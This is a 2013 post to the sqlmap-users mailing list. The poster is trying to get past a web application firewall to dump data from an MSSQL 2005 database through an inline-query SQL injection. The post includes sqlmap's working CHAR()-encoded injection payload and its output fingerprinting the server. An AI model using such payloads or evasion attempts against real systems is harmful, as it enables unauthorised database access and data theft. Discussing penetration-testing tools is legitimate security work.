[sqlmap-users] Tricky Injection - Mssql 2005 w/ robust Waf
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Tricky Injection - Mssql 2005 w/ robust Waf
|
From: Matheus V. <mat...@gm...> - 2013-02-25 19:38:42
|
Hello !
I'm testing an ASP application running under Mssql 2005 that is vulnerable
to Microsoft SQL Server/Sybase inline queries but I'm unable to detect the
name of the database and this is preventing me to dump data from it.
I've already got some table names using '--common-tables' but no matter
what tamper/tamper combination I do, I cannot dump.
Can someone share any thoughts?
Thanks a lot !
Matheus.
Here is a sample of an Http Request:
___
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: xxxx
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: xxxx=(SELECT
CHAR(58)+CHAR(109)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN
(9983=9983) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(100)+CHAR(97)+CHAR(122)+CHAR(58))
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: All
Table: dbo.xxxx
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| user | non-numeric |
+--------+-------------+
|
